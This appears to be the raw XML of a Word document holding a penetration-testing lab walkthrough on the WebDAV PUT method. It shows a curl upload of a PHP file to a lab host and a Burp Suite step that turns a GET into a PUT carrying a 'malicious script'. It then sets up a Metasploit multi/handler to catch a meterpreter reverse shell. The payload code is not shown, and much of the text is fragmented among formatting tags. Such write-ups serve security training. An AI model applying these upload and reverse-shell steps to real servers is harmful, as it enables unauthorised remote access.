        <w:t>curl http://192.168.92.129/dav/ --upload-file /home/kali/Desktop/Pentest/curl.php -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535AA1" w:rsidRPr="00037DBC" w:rsidRDefault="00535AA1" w:rsidP="00535AA1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PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4695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rl sc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A1" w:rsidRDefault="00535AA1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8C3EC9" w:rsidRPr="007B4CF3" w:rsidRDefault="008C3EC9" w:rsidP="008C3EC9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 xml:space="preserve">tar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“exploit/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multi/handl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et the required values, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535AA1" w:rsidRPr="008C3EC9" w:rsidRDefault="008C3EC9" w:rsidP="008C3EC9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lick on the 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uploaded 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curl</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF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php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. Once run, we will get the TCP reverse connection automatically on the meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C3EC9" w:rsidRPr="008C3EC9" w:rsidRDefault="008C3EC9" w:rsidP="008C3EC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360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rl me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97" w:rsidRPr="00037DBC" w:rsidRDefault="00C63497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037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting PUT Method Using Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00967ED5" w:rsidRPr="00967ED5" w:rsidRDefault="00967ED5" w:rsidP="009B30E0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67ED5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Configure the manual proxy settings of end users’ browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00967ED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9B30E0" w:rsidRDefault="00967ED5" w:rsidP="009B30E0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B30E0" w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and navigate</w:t>
      </w:r>
      <w:r w:rsidR="009B30E0" w:rsidRPr="00037D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="009B30E0" w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>urp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suite</w:t>
      </w:r>
      <w:r w:rsidR="009B30E0" w:rsidRPr="00037DBC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click I</w:t>
      </w:r>
      <w:r w:rsidR="009B30E0" w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntercept ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to capture the request. Then reload the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00967ED5" w:rsidRPr="00037DBC" w:rsidRDefault="00967ED5" w:rsidP="00967ED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211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cep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0" w:rsidRDefault="00967ED5" w:rsidP="009B30E0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the captured request to Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4472" w:rsidRDefault="00DC4472" w:rsidP="00DC4472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the </w:t>
      </w:r>
      <w:r w:rsidR="00967ED5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, change “GET /dav/” to “PUT /dav/burp.php”</w:t>
      </w:r>
      <w:r w:rsidR="004572C9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include the malicious script below the click SEND.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4472" w:rsidRDefault="00DC4472" w:rsidP="00DC4472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60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t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C9" w:rsidRPr="007B4CF3" w:rsidRDefault="004572C9" w:rsidP="004572C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 xml:space="preserve">tar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“exploit/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multi/handl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A9198A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et the required values, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004572C9" w:rsidRPr="004572C9" w:rsidRDefault="004572C9" w:rsidP="004572C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lick on the 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uploaded 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burp</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF3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php</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Once run, we will get the TCP reverse connection automatically on the meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004572C9" w:rsidRPr="008C3EC9" w:rsidRDefault="004572C9" w:rsidP="004572C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PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="594360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rp me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0" w:rsidRPr="00037DBC" w:rsidRDefault="009B30E0" w:rsidP="009B30E0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7D1502" w:rsidRPr="00037DBC" w:rsidRDefault="007D1502" w:rsidP="009B30E0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D1502" w:rsidRPr="00037D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6C" w:rsidRDefault="00961E6C" w:rsidP="00C8232F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00961E6C" w:rsidRDefault="00961E6C" w:rsidP="00C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6C" w:rsidRDefault="00961E6C" w:rsidP="00C8232F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00961E6C" w:rsidRDefault="00961E6C" w:rsidP="00C8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420"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BE020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6FEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A508F62"/>
    <w:lvl w:ilvl="0" w:tplc="38767C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043F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FB0F60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638C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AEAD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53C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="24507E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2F"/>
    <w:rsid w:val="00001DD8"/>
    <w:rsid w:val="00037DBC"/>
    <w:rsid w:val="00082554"/>
    <w:rsid w:val="0016159A"/>
    <w:rsid w:val="001F4B6B"/>
    <w:rsid w:val="00224D46"/>
    <w:rsid w:val="00423A29"/>
    <w:rsid w:val="00447DE8"/>
    <w:rsid w:val="004572C9"/>
    <w:rsid w:val="00514BCE"/>
    <w:rsid w:val="00535AA1"/>
    <w:rsid w:val="005549C3"/>
    <w:rsid w:val="00646D4D"/>
    <w:rsid w:val="00687D94"/>
    <w:rsid w:val="007B4CF3"/>
    <w:rsid w:val="007D1502"/>
    <w:rsid w:val="00824EF5"/>
    <w:rsid w:val="008C3EC9"/>
    <w:rsid w:val="00961E6C"/>
    <w:rsid w:val="00967ED5"/>
    <w:rsid w:val="00990148"/>
    <w:rsid w:val="009B30E0"/>
    <w:rsid w:val="00A9198A"/>
    <w:rsid w:val="00B735C6"/>
    <w:rsid w:val="00C209E4"/>
    <w:rsid w:val="00C63497"/>
    <w:rsid w:val="00C8232F"/>
    <w:rsid w:val="00CA21E7"/>
    <w:rsid w:val="00CE6BFF"/>
    <w:rsid w:val="00DC4472"/>
    <w:rsid w:val="00DE0458"/>
    <w:rsid w:val="00E637D2"/>
    <w:rsid w:val="00EB3EBB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890D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB4E4A43-01DD-450F-A1C2-CD935AD1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3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2F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C8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2F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F11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61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2.129/dav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192.168.92.129/dav/" TargetMode="Externa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1094-B148-4784-81BC-E51B21C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y Lucido</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mackoy Lucido</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-31T10:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-01T13:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>